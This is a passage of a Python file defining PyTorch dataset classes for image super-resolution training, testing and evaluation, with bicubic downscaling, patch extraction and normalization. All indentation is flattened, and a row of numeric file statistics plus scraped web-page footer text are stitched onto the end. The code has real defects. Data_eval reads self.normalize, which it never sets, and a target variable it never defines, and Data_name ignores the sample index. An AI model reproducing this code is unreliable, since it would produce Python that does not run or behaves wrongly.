target = target * 2 - 1
input_ref = input_ref * 2 - 1
bicubic_ref = bicubic_ref * 2 - 1
target_ref = target_ref * 2 - 1
return input, target, bicubic, input_ref, target_ref, bicubic_ref, file, file_ref
def __len__(self):
return len(self.image_filenames)
class Data_name(data.Dataset):
def __init__(self, image_dir, image_dir_ref, patch_size, upscale_factor, data_augmentation, normalize, transform=None):
super(Data_name, self).__init__()
self.image_filenames = image_dir
self.image_filenames_ref = image_dir_ref
self.patch_size = patch_size
self.upscale_factor = upscale_factor
self.transform = transform
self.data_augmentation = data_augmentation
self.normalize = normalize
def __getitem__(self, index):
target = load_img(self.image_filenames)
_, file = os.path.split(self.image_filenames)
target = target.crop((0, 0, target.size[0] // self.upscale_factor * self.upscale_factor, target.size[1] // self.upscale_factor * self.upscale_factor))
input = target.resize((int(target.size[0]/self.upscale_factor),int(target.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic = rescale_img(input, self.upscale_factor)
target_ref = load_img(self.image_filenames_ref)
_, file_ref = os.path.split(self.image_filenames_ref)
target_ref = target_ref.crop((0, 0, target_ref.size[0] // self.upscale_factor * self.upscale_factor, target_ref.size[1] // self.upscale_factor * self.upscale_factor))
input_ref = target_ref.resize((int(target_ref.size[0]/self.upscale_factor),int(target_ref.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic_ref = rescale_img(input_ref, self.upscale_factor)
input, target, bicubic, input_ref, target_ref, bicubic_ref, _ = get_patch_ref(input,target,bicubic,input_ref,target_ref,bicubic_ref,self.patch_size, self.upscale_factor)
if self.data_augmentation:
input, target, bicubic, _ = augment(input, target, bicubic)
if self.transform:
input = self.transform(input)
bicubic = self.transform(bicubic)
target = self.transform(target)
input_ref = self.transform(input_ref)
bicubic_ref = self.transform(bicubic_ref)
target_ref = self.transform(target_ref)
if self.normalize:
input = input * 2 - 1
bicubic = bicubic * 2 - 1
target = target * 2 - 1
input_ref = input_ref * 2 - 1
bicubic_ref = bicubic_ref * 2 - 1
target_ref = target_ref * 2 - 1
return input, target, bicubic, input_ref, target_ref, bicubic_ref, file, file_ref
def __len__(self):
return len(self.image_filenames)
class Data_patch(data.Dataset):
def __init__(self, image_dir, patch_size, upscale_factor, data_augmentation, normalize, transform=None):
super(Data_patch, self).__init__()
self.image_filenames = [join(image_dir, x) for x in listdir(image_dir) if is_image_file(x)]
self.patch_size = patch_size
self.upscale_factor = upscale_factor
self.transform = transform
self.data_augmentation = data_augmentation
self.normalize = normalize
def __getitem__(self, index):
target = load_img(self.image_filenames[index])
_, file = os.path.split(self.image_filenames[index])
target = target.crop((0, 0, target.size[0] // self.upscale_factor * self.upscale_factor, target.size[1] // self.upscale_factor * self.upscale_factor))
input = target.resize((int(target.size[0]/self.upscale_factor),int(target.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic = rescale_img(input, self.upscale_factor)
input, target, bicubic, _ = get_patch(input,target,bicubic,self.patch_size, self.upscale_factor)
if self.data_augmentation:
input, target, bicubic, _ = augment(input, target, bicubic)
if self.transform:
input = self.transform(input)
bicubic = self.transform(bicubic)
target = self.transform(target)
if self.normalize:
input = input * 2 - 1
bicubic = bicubic * 2 - 1
target = target * 2 - 1
return input, target, bicubic
def __len__(self):
return len(self.image_filenames)
class Data_test(data.Dataset):
def __init__(self, image_dir, upscale_factor, normalize, transform=None):
super(Data_test, self).__init__()
self.image_filenames = [join(image_dir, x) for x in listdir(image_dir) if is_image_file(x)]
self.upscale_factor = upscale_factor
self.transform = transform
self.normalize = normalize
def __getitem__(self, index):
target = load_img(self.image_filenames[index])
_, file = os.path.split(self.image_filenames[index])
target = target.crop((0, 0, target.size[0] // self.upscale_factor * self.upscale_factor, target.size[1] // self.upscale_factor * self.upscale_factor))
input = target.resize((int(target.size[0]/self.upscale_factor),int(target.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic = rescale_img(input, self.upscale_factor)
if self.transform:
input = self.transform(input)
bicubic = self.transform(bicubic)
target = self.transform(target)
if self.normalize:
input = input * 2 - 1
bicubic = bicubic * 2 - 1
target = target * 2 - 1
return input, target, bicubic, file
def __len__(self):
return len(self.image_filenames)
class Data_eval(data.Dataset):
def __init__(self, image_dir, upscale_factor, normalize, transform=None):
super(Data_eval, self).__init__()
self.image_filenames = [join(image_dir, x) for x in listdir(image_dir) if is_image_file(x)]
self.upscale_factor = upscale_factor
self.transform = transform
def __getitem__(self, index):
input = load_img(self.image_filenames[index])
bicubic = rescale_img(input, self.upscale_factor)
_, file = os.path.split(self.image_filenames[index])
if self.transform:
input = self.transform(input)
bicubic = self.transform(bicubic)
if self.normalize:
input = input * 2 - 1
bicubic = bicubic * 2 - 1
target = target * 2 - 1
return input, bicubic, file
def __len__(self):
return len(self.image_filenames) | 40.344051 | 177 | 0.629633 | 1,718 | 12,547 | 4.332945 | 0.077416 | 0.106529 | 0.11647 | 0.025793 | 0.86338 | 0.841349 | 0.830333 | 0.808033 | 0.797555 | 0.781166 | 0 | 0.015179 | 0.254403 | 12,547 | 311 | 178 | 40.344051 | 0.780545 | 0.018331 | 0 | 0.710526 | 0 | 0 | 0.008371 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092105 | false | 0 | 0.030702 | 0.026316 | 0.214912 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.